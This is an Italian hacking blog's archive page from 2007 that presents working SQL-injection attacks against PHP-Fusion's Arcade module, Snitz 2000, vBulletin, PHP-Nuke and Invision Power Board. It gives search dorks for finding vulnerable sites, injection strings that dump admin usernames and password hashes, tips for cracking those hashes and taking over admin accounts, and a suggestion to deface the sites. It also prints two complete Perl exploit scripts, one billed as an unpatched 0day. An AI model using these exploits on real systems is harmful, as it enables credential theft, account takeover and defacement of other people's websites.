Archivio per la categoria 'Exploit'

Exploit PHP-FUSION Arcade Module (cid) Remote SQL Injection Vulnerability

Pubblicato 17, Luglio, 2007 Exploit Commenti

Un altro exploit by Xoron, il bug affligge PHP-Fusion precisamente il modulo Arcade, è una remote SQL Injection.

Inanzitutto possiamo aiutare qualche webmaster sprovveduto che non ha ancora aggiornato il suo portale,

possiamo trovare siti vulnerabili con una GOOGLE DORK, facciamo una ricerca su google scrivendo: /infusions/arcade/, non appena troviamo un sito vulnerabile possiamo avvisare l’amministratore del bug.

Il bug è nell’ index.php, basta aggiungere all’indirizzo http://indirizzovittima.com/infusions/arcade/

la stringa:
index.php?op=view_game_list&cid=-1/**/union/**/select/**/

null,user_name,user_password,null,null,null/**/from/**/fusion_users/*

Aggiorniamo la pagina, se l’exploit ha funzionato il modulo Arcade ci mostrerà gli User e le password criptate in Hash MD5, copiamo i dati dell’admin, e diamo in pasto l’hash a passcracking.ru.

Non appena il cracker ci restituisce la password in chiaro, possiamo effettuare l’accesso al portale con l’account dell’Admin, possiamo defacciare il sito con un redirect ad un nostro indirizzo con una nostra grafica personalizzata che indica il bug e i possibili rimedi, mi raccomando niente danni! ;-)

Un vero hacker si limita soltando a segnalare i bug e a dare spiegazioni su come risolverli, non distrugge nulla!

Adesso vi saluto! Alla prossima! Ciau :-)

Exploit Snitz 2000 Version 3.1 SR4 Remote SQL Injection Vulnerability

Pubblicato 17, Luglio, 2007 Exploit Commenti

Un exploit powered by XORON, una Remote SQL Injection Vulnerability per i Forum SNITZ 2000 v3.1 SR4.

Il funzionamento è semplcissimo, la vulnerabilità è nella pagina pop_profile.asp:

trovare l’username dell’Admin:

aggiungere all’indirizzo del forum vittima pop_profile.asp?mode=display&id=1

esempio: http://forumvittima.it/pop_profile.asp?mode=display&id=1

vi comparirà il nick dell’Admin;

trovare la password dell’Admin:

aggiungere all’indirizzo del forum vittima pop_profile.asp?

mode=display&id=-1+union+all+select+0,M_PASSWORD,2,3,4,5,6,7,8,9

,10,11,12,13,14,15,16,17,18,19,20,21,

22,23,24,25,26,27,28,29,30,31+from+FORUM_MEMBERS

Ecco che compare l’hash MD5 della password, adesso basta crackarla con il cracker di milw0rm.
Voilà avete il pieno controllo del Forum!

Bye Bye ;-)

Exploit vBulletin 3.6.4 inlinemod.php postids SQL Injection

Pubblicato 3, Luglio, 2007 Exploit Commenti

Oggi sono in vena di exploit!

Eccovene un altro in PHP, si tratta di un SQL INJECTION nell’inlinemod.php di un vBulletin 3.6.4 .

Per utilizzare un exploit in PHP abbiamo bisogno di un webserver e dell’intrerprete, vi consiglio di installare il pacchetto EasyPHP, che comprende oltre al server web Apache anche MySQL, vi può sempre ritornare utile!

Successivamente installiamo il PHP, dopodiche non vi resta che copiare il codice dell’exploit in un blocconote, inserite la pagina salvata con estensione .php nella cartella www di EasyPHP e aprite il vostro Browser.

Adesso nella barra scrivete “http://localhost/nomeexploit.php”, vi appariranno le istruzioni, configurate, compilate e eseguitelo da DOS con questo comando “C:\*exploit_path*\>nomeexploit.php”.

Scarica l’exploit -> vbulletin.zip

PHP-Nuke Http Referers Remote SQL-Injection Exploit (NON FIXATA)

Pubblicato 2, Luglio, 2007 Exploit 22 Commenti

Un pericoloso bug affligge tutte le versioni di PHP-NUKE, il bug sottostante è nell’index.php, dopo aver fatto girare il nostro exploit, il blocco referenti ci mostrerà il l’user e la password dell’admin criptata in hash md5. Successivamente non vi resta che usare il cracker md5 di Milw0rm per crackare la password.

$db->sql_query(”INSERT INTO “.$prefix.”_referer VALUES (NULL, ‘”.$referer.”‘)”)

Questa è una 0day, non è ancora stata fixata, l’unico consiglio che posso dare ai meno esperti è quello di togliere il blocco referenti, invece chi è pratico di PHP con poche modifiche al codice può tappare questa enorme falla.

Codice exploit:

#!/usr/bin/perl
#0day exploit for PHP-nuke <=8.0 Final
#Sql injection attack in INSERT syntax
#version, when ‘HTTP Referers’ block is on
#Coded by:Maciej `krasza` Kukla[krasza@gmail.com]
#Screenshot:
#0day exploit for PHP-nuke <=8.0 Final
#Sql injection attack in INSERT syntax
#version, when ‘HTTP Referers’ block is on
#Coded by:Maciej `krasza` Kukla[krasza@gmail.com]
#
#[+]You can see login and hash on web page in ‘HTTP referers’ block
#[+]Exploit successed
use strict;
use warnings;
use LWP;
my $adres=shift or help()
my $ua = LWP::UserAgent->new;
my $zadanie = HTTP::Request->new(GET => $adres)
my ($respone,$referer)
banner()
$referer=”http://www.krasza.int.pl’),(NULL,(SELECT `pwd` FROM `nuke_authors` WHERE `radminsuper`=1))/*”;
$zadanie->referer($referer)
$respone=$ua->request($zadanie)
$respone->is_success or die “$adres : “,$respone->message,”\n”;
$referer=”http://www.krasza.int.pl’),(NULL,(SELECT `aid` FROM `nuke_authors` WHERE `radminsuper`=1))/*”;
$zadanie->referer($referer)
$respone=$ua->request($zadanie)
$respone->is_success or die “$adres : “,$respone->message,”\n”;
print “[+]You can see login and hash on web page in ‘HTTP referers’ block\n”;
print “[+]Exploit successed\n”;
sub banner{
print “0day exploit for PHP-nuke <=8.0 Final\n”;
print “Sql injection attack in INSERT syntax\n”;
print “version, when ‘HTTP Referers’ block is on\n”;
print “Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n\n”;
}
sub help{
print “0day exploit for PHP-nuke <=8.0 Final\n”;
print “Sql injection attack in INSERT syntax\n”;
print “version, when ‘HTTP Referers’ block is on\n”;
print “Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n”;
print “Use:\n”;
print “\tperl exploit.pl [url]\n”;
print “\t[url]-vicitim webpage with index.php\n”;
print “Example:\n”;
print “\tperl exploit.pl http://phpnuke.org/index.php\n”;
exit(0)
}

Happy Testing! ;-)

Invision Power Board SQL Injenction Exploit 2.1 -> 2.1.6

Pubblicato 2, Luglio, 2007 Exploit Commenti

Precedentemente avevo scritto un articolo su un Exploit in perl che sfruttava una SQL Injection su un Invison Power Board <=2.0.3, andate a rivedere l’articolo, il funzionamento è identico al precendete exploit, non dovete specificare il numero di versione del Forum perchè si tratta della stessa serie! ;-)

Eccovi il codice:

#!/usr/bin/perl
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
&header()
if (@ARGV < 2) {&info() exit()}
$server = $ARGV[0];
$dir = $ARGV[1];
print “
SERVER {$server}\r\n”;
print “
DIR {$dir}\r\n”;
#Step 1, detecting vulnerability
print “[1] Testing forum vulnerability…”;
$q = “UNION SELECT ‘VULN’,1,1,1/*”;
query($q,$server,$dir)
if($rep =~/VULN/){ print “forum vulnerable\r\n”; }
else
{
print “forum unvulnerable\r\n”;
&footer()
exit()
}
#Step 2, detecting prefix
print “[2] Searching prefix…”;
$q = “”;
query($q,$server,$dir)
$prefix = $rep;
print $prefix.”\r\n”;
#Step 3, make query
print “[3] Performing query; it may take several minutes, plz, wait…\r\n”;
$q1 = “UNION SELECT MAX(converge_id),1,1,1 FROM “.$prefix.”members_converge/*”;
query($q1,$server,$dir)
$kol = $rep;
open(RES,”>”.$server.”_result.txt”)
for($id = 1; $id <= $kol; $id++)
{
$own_query = “UNION SELECT converge_pass_hash,1,1,1 FROM “.$prefix.”members_converge WHERE converge_id=”.$id.”/*”;
query($own_query,$server,$dir)
if($rep=~/[0-9a-f]{32}/i)
{
$hash = $rep;
$own_query = “UNION SELECT converge_pass_salt,1,1,1 FROM “.$prefix.”members_converge WHERE converge_id=”.$id.”/*”;
query($own_query,$server,$dir)
if(length($rep)==5)
{
$salt = $rep;
$own_query = “UNION SELECT converge_email,1,1,1 FROM “.$prefix.”members_converge WHERE converge_id=”.$id.”/*”;
query($own_query,$server,$dir)
if(length($rep)>0)
{
$email = $rep;
print RES $id.”:”.$hash.”:”.$salt.”::”.$email.”\n”;
}
}
}
}
close(RES)
print “[!] Query was successfully perfomed. Results are in txt files\r\n”;
&footer()
$ex = ;
sub footer()
{
print “[G] Greets: 1dt.w0lf (rst/ghc)\r\n”;
print “[L] Visit: secbun.info | damagelab.org | rst.void.ru\r\n”;
}
sub header()
{
print q(
———————————————————-
* Invision Power Board 2.1.* Remote SQL Injecton Exploit *
* Based on r57-Advisory#41 by 1dt.w0lf (rst/ghc) *
* Coded by w4g.not null *
* FOR EDUCATIONAL PURPOSES *ONLY* *
———————————————————-
)
}
sub info()
{
print q(
Usage: perl w4gipb216.pl [server] [/dir/]
where
|- server - server, where IPB installed without http://
|- /dir/ - dir, where IPB installed or / for no dir
e.g perl w4gipb216.pl someserver.com /forum/
Stealing info about users (format id:pass:salt::email)
[!] Need MySQL > 4.0
)
}
sub query()
{
my($q,$server,$dir) = @_;
$res = $ua->get(”http://”.$server.$dir.”index.php?s=w00t”,’USER_AGENT’=>”,’CLIENT_IP’=>”‘ “.$q)
if($res->is_success)
{
$rep = ”;
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)”(.*)”/) { $rep = $3; }
else
{
if($res->as_string =~ /FROM (.*)sessions/) { $rep = $1; }
}
}
return $rep;
}

Buon Testing! ;-)

Pagina Successiva »

Feeds RSS web, e-mail e mobile.

Creative Commons License
UnderGround0 World by
Parello Giuseppe è pubblicato sotto una Licenza Creative Commons.
La riproduzione di tutto o parte dei contenuti di questo sito potranno avvenire solo senza alcun scopo di lucro e dovranno riportare la fonte originaria ed un link a UnderGround0 World o quella degli autori orginari. I trasgressori saranno perseguiti secondo le norme:Art. 173ter e Art. 174ter

Web Hosting PHP, MYSQL ad un prezzo stracciato! Offerta! 8.99E


Il Gioco Della Vita



DISCLAIMER
Le informazioni da me divulgate sono da ritenersi a puro scopo informativo e di studio. Non mi assumo nessuna responsabilità riguardante l'uso improprio o illecito e di tutti i danni o perdite di guadagni che ne possano derivare.




Contatore Visite

  • 346,721 visite



Tophost Hosting























My blog is worth $923,387.24.
How much is your blog worth?



Berluscounter!

NoCocozza!